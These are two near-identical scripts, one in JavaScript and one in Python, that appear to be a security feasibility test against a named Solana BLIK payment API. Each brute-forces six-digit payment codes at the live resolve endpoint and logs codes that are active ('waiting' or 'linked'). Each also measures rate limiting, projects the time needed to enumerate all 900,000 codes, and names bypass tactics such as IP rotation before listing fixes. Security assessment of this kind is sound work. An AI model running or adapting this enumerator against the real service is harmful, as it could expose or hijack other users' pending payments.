File: test_enumeration.js
#!/usr/bin/env node

/**
 * Security Test: Code Enumeration Feasibility Assessment
 * Target: Solana BLIK API - Code Resolution Endpoint
 */

const https = require("https");
const http = require("http");

const BASE_URL = "https://solana-blik.vercel.app/api/codes/{}/resolve";
const START_CODE = 100000;
const END_CODE = 100100;
const TOTAL_CODE_SPACE = 900000;

const results = {
  successful: 0,
  rateLimited: 0,
  errors: 0,
  validCodes: [],
  statusCodes: {},
  responseTimes: [],
};

function makeRequest(code) {
  return new Promise((resolve) => {
    const url = BASE_URL.replace("{}", code);
    const urlObj = new URL(url);
    const requestStart = Date.now();

    const req = https.get(
      {
        hostname: urlObj.hostname,
        path: urlObj.pathname,
        timeout: 10000,
      },
      (res) => {
        const requestDuration = Date.now() - requestStart;
        results.responseTimes.push(requestDuration);

        const statusCode = res.statusCode;
        results.statusCodes[statusCode] =
          (results.statusCodes[statusCode] || 0) + 1;

        let data = "";
        res.on("data", (chunk) => {
          data += chunk;
        });

        res.on("end", () => {
          if (statusCode === 200) {
            results.successful++;
            try {
              const json = JSON.parse(data);
              const status = json.status || "unknown";

              if (status === "waiting" || status === "linked") {
                results.validCodes.push({ code, status, data: json });
                console.log(
                  `✓ Code ${code}: ${status.toUpperCase()} - VALID CODE FOUND!`
                );
              } else {
                console.log(`  Code ${code}: ${status}`);
              }
            } catch (e) {
              console.log(`  Code ${code}: HTTP 200 (parse error: ${e.message})`);
            }
          } else if (statusCode === 429) {
            results.rateLimited++;
            console.log(`✗ Code ${code}: RATE LIMITED (429)`);
          } else if (statusCode === 404) {
            console.log(`  Code ${code}: Not found`);
          } else {
            results.errors++;
            console.log(`✗ Code ${code}: HTTP ${statusCode}`);
          }

          resolve();
        });
      }
    );

    req.on("error", (err) => {
      results.errors++;
      console.log(`✗ Code ${code}: ERROR - ${err.message}`);
      resolve();
    });

    req.on("timeout", () => {
      req.destroy();
      results.errors++;
      console.log(`✗ Code ${code}: TIMEOUT`);
      resolve();
    });
  });
}

async function testEnumeration() {
  console.log("=".repeat(70));
  console.log("SECURITY TEST: Code Enumeration Feasibility");
  console.log("=".repeat(70));
  console.log(`Target: ${BASE_URL.replace("{}", "XXXXXX")}`);
  console.log(`Test Range: ${START_CODE} - ${END_CODE}`);
  console.log(`Total Codes to Test: ${END_CODE - START_CODE + 1}`);
  console.log(
    `Start Time: ${new Date().toISOString().replace("T", " ").slice(0, 19)}`
  );
  console.log("-".repeat(70));

  const startTime = Date.now();

  // Test each code sequentially
  for (let code = START_CODE; code <= END_CODE; code++) {
    await makeRequest(code);
  }

  const endTime = Date.now();
  const totalDuration = (endTime - startTime) / 1000; // in seconds

  // Calculate metrics
  const totalRequests = END_CODE - START_CODE + 1;
  const requestsPerSecond =
    totalDuration > 0 ? totalRequests / totalDuration : 0;
  const avgResponseTime =
    results.responseTimes.length > 0
      ? results.responseTimes.reduce((a, b) => a + b, 0) /
        results.responseTimes.length / 1000
      : 0;

  // Calculate full enumeration time
  let fullEnumerationSeconds, fullEnumerationMinutes, fullEnumerationHours;
  if (requestsPerSecond > 0) {
    fullEnumerationSeconds = TOTAL_CODE_SPACE / requestsPerSecond;
    fullEnumerationMinutes = fullEnumerationSeconds / 60;
    fullEnumerationHours = fullEnumerationMinutes / 60;
  } else {
    fullEnumerationSeconds = Infinity;
    fullEnumerationMinutes = Infinity;
    fullEnumerationHours = Infinity;
  }

  // Print summary
  console.log("\n" + "=".repeat(70));
  console.log("TEST RESULTS SUMMARY");
  console.log("=".repeat(70));
  console.log(`Total Requests Sent:        ${totalRequests}`);
  console.log(`Successful Requests (200):  ${results.successful}`);
  console.log(`Rate Limited (429):         ${results.rateLimited}`);
  console.log(`Errors:                     ${results.errors}`);
  console.log(`Valid Codes Found:          ${results.validCodes.length}`);
  console.log();

  console.log("Status Code Distribution:");
  Object.keys(results.statusCodes)
    .sort()
    .forEach((code) => {
      console.log(`  HTTP ${code}: ${results.statusCodes[code]} requests`);
    });
  console.log();

  console.log("Performance Metrics:");
  console.log(`  Total Time:              ${totalDuration.toFixed(2)} seconds`);
  console.log(
    `  Average Response Time:   ${avgResponseTime.toFixed(3)} seconds`
  );
  console.log(
    `  Requests per Second:     ${requestsPerSecond.toFixed(2)} req/s`
  );
  console.log();

  console.log("=".repeat(70));
  console.log("ATTACK FEASIBILITY ANALYSIS");
  console.log("=".repeat(70));
  console.log(
    `Total Code Space:           ${TOTAL_CODE_SPACE.toLocaleString()} codes (100000-999999)`
  );
  console.log(
    `Measured Rate:              ${requestsPerSecond.toFixed(2)} requests/second`
  );
  console.log();

  if (results.rateLimited > 0) {
    console.log("⚠️  RATE LIMITING DETECTED!");
    console.log(
      `   ${results.rateLimited} requests were rate limited (HTTP 429)`
    );
    console.log(
      `   Rate limiting kicked in at: ${results.rateLimited} / ${totalRequests} requests`
    );
    console.log();
  }

  console.log("Mathematical Proof - Full Enumeration Time:");
  console.log(`  At ${requestsPerSecond.toFixed(2)} req/s:`);
  console.log(
    `    • ${TOTAL_CODE_SPACE.toLocaleString()} codes ÷ ${requestsPerSecond.toFixed(2)} req/s`
  );
  console.log(
    `    • = ${fullEnumerationSeconds.toLocaleString("en-US", { maximumFractionDigits: 0 })} seconds`
  );
  console.log(
    `    • = ${fullEnumerationMinutes.toLocaleString("en-US", { maximumFractionDigits: 1 })} minutes`
  );
  console.log(
    `    • = ${fullEnumerationHours.toLocaleString("en-US", { maximumFractionDigits: 2 })} hours`
  );
  console.log();

  // Verdict
  console.log("=".repeat(70));
  console.log("SECURITY VERDICT");
  console.log("=".repeat(70));

  if (results.rateLimited > 0) {
    console.log("⚠️  PARTIALLY VULNERABLE");
    console.log("   Rate limiting exists but may be bypassable with:");
    console.log("   - Distributed attack (multiple IPs)");
    console.log("   - Slower enumeration over longer time period");
    console.log("   - IP rotation techniques");
  } else {
    console.log("🚨 CRITICALLY VULNERABLE");
    console.log("   NO RATE LIMITING DETECTED!");
    console.log("   Full code space enumeration is FEASIBLE!");
  }

  console.log();

  if (results.validCodes.length > 0) {
    console.log(
      `⚠️  VALID CODES DISCOVERED: ${results.validCodes.length}`
    );
    console.log("   Codes found in test range:");
    results.validCodes.forEach((valid) => {
      console.log(`   - Code ${valid.code}: ${valid.status}`);
    });
    console.log();
  }

  console.log("Recommendation:");
  console.log("  1. Implement strict rate limiting (e.g., 10 requests per minute)");
  console.log("  2. Add CAPTCHA after N failed attempts");
  console.log("  3. Use longer, non-sequential code format");
  console.log("  4. Implement account-level throttling");
  console.log("  5. Add exponential backoff for repeated attempts");
  console.log("=".repeat(70));
}

testEnumeration().catch((err) => {
  console.error("\n\nTest failed with error:", err);
  process.exit(1);
});

File: test_enumeration.py
#!/usr/bin/env python3
"""Security Test: Code Enumeration Feasibility Assessment"""

import requests
import time
from datetime import datetime
from collections import defaultdict

BASE_URL = "https://solana-blik.vercel.app/api/codes/{}/resolve"
START_CODE = 100000
END_CODE = 100100
TOTAL_CODE_SPACE = 900000

def test_code_enumeration():
    print("=" * 70)
    print("SECURITY TEST: Code Enumeration Feasibility")
    print("=" * 70)
    print(f"Target: {BASE_URL.format("XXXXXX")}")
    print(f"Test Range: {START_CODE} - {END_CODE}")
    print(f"Total Codes to Test: {END_CODE - START_CODE + 1}")
    print(f"Start Time: {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}")
    print("-" * 70)
    
    results = {
        "successful": 0,
        "rate_limited": 0,
        "errors": 0,
        "valid_codes": [],
        "status_codes": defaultdict(int),
        "response_times": []
    }
    
    start_time = time.time()
    
    for code in range(START_CODE, END_CODE + 1):
        try:
            request_start = time.time()
            url = BASE_URL.format(code)
            response = requests.get(url, timeout=10)
            request_duration = time.time() - request_start
            
            results["response_times"].append(request_duration)
            results["status_codes"][response.status_code] += 1
            
            if response.status_code == 200:
                results["successful"] += 1
                try:
                    data = response.json()
                    status = data.get("status", "unknown")
                    if status in ["waiting", "linked"]:
                        results["valid_codes"].append({"code": code, "status": status, "data": data})
                        print(f"✓ Code {code}: {status.upper()} - VALID CODE FOUND!")
                    else:
                        print(f"  Code {code}: {status}")
                except Exception as e:
                    print(f"  Code {code}: HTTP 200 (parse error: {e})")
            elif response.status_code == 429:
                results["rate_limited"] += 1
                print(f"✗ Code {code}: RATE LIMITED (429)")
            elif response.status_code == 404:
                print(f"  Code {code}: Not found")
            else:
                results["errors"] += 1
                print(f"✗ Code {code}: HTTP {response.status_code}")
        except requests.exceptions.Timeout:
            results["errors"] += 1
            print(f"✗ Code {code}: TIMEOUT")
        except Exception as e:
            results["errors"] += 1
            print(f"✗ Code {code}: ERROR - {e}")
    
    end_time = time.time()
    total_duration = end_time - start_time
    total_requests = END_CODE - START_CODE + 1
    requests_per_second = total_requests / total_duration if total_duration > 0 else 0
    avg_response_time = sum(results["response_times"]) / len(results["response_times"]) if results["response_times"] else 0
    
    if requests_per_second > 0:
        full_enumeration_seconds = TOTAL_CODE_SPACE / requests_per_second
        full_enumeration_minutes = full_enumeration_seconds / 60
        full_enumeration_hours = full_enumeration_minutes / 60
    else:
        full_enumeration_seconds = float("inf")
        full_enumeration_minutes = float("inf")
        full_enumeration_hours = float("inf")
    
    print("\n" + "=" * 70)
    print("TEST RESULTS SUMMARY")
    print("=" * 70)
    print(f"Total Requests Sent:        {total_requests}")
    print(f"Successful Requests (200):  {results["successful"]}")
    print(f"Rate Limited (429):         {results["rate_limited"]}")
    print(f"Errors:                     {results["errors"]}")
    print(f"Valid Codes Found:          {len(results["valid_codes"])}")
    print()
    print("Status Code Distribution:")
    for status_code, count in sorted(results["status_codes"].items()):
        print(f"  HTTP {status_code}: {count} requests")
    print()
    print("Performance Metrics:")
    print(f"  Total Time:              {total_duration:.2f} seconds")
    print(f"  Average Response Time:   {avg_response_time:.3f} seconds")
    print(f"  Requests per Second:     {requests_per_second:.2f} req/s")
    print()
    print("=" * 70)
    print("ATTACK FEASIBILITY ANALYSIS")
    print("=" * 70)
    print(f"Total Code Space:           {TOTAL_CODE_SPACE:,} codes (100000-999999)")
    print(f"Measured Rate:              {requests_per_second:.2f} requests/second")
    print()
    if results["rate_limited"] > 0:
        print("⚠️  RATE LIMITING DETECTED!")
        print(f"   {results["rate_limited"]} requests were rate limited (HTTP 429)")
        print(f"   Rate limiting kicked in at: {results["rate_limited"]} / {total_requests} requests")
        print()
    print("Mathematical Proof - Full Enumeration Time:")
    print(f"  At {requests_per_second:.2f} req/s:")
    print(f"    • {TOTAL_CODE_SPACE:,} codes ÷ {requests_per_second:.2f} req/s")
    print(f"    • = {full_enumeration_seconds:,.0f} seconds")
    print(f"    • = {full_enumeration_minutes:,.1f} minutes")
    print(f"    • = {full_enumeration_hours:,.2f} hours")
    print()
    print("=" * 70)
    print("SECURITY VERDICT")
    print("=" * 70)
    if results["rate_limited"] > 0:
        print("⚠️  PARTIALLY VULNERABLE")
        print("   Rate limiting exists but may be bypassable with:")
        print("   - Distributed attack (multiple IPs)")
        print("   - Slower enumeration over longer time period")
        print("   - IP rotation techniques")
    else:
        print("🚨 CRITICALLY VULNERABLE")
        print("   NO RATE LIMITING DETECTED!")
        print("   Full code space enumeration is FEASIBLE!")
    print()
    if len(results["valid_codes"]) > 0:
        print(f"⚠️  VALID CODES DISCOVERED: {len(results["valid_codes"])}")
        print("   Codes found in test range:")
        for valid in results["valid_codes"]:
            print(f"   - Code {valid["code"]}: {valid["status"]}")
        print()
    print("Recommendation:")
    print("  1. Implement strict rate limiting (e.g., 10 requests per minute)")
    print("  2. Add CAPTCHA after N failed attempts")
    print("  3. Use longer, non-sequential code format")
    print("  4. Implement account-level throttling")
    print("  5. Add exponential backoff for repeated attempts")
    print("=" * 70)
    return results

if __name__ == "__main__":
    try:
        results = test_code_enumeration()
    except KeyboardInterrupt:
        print("\n\nTest interrupted by user.")
    except Exception as e:
        print(f"\n\nTest failed with error: {e}")
        import traceback
        traceback.print_exc()
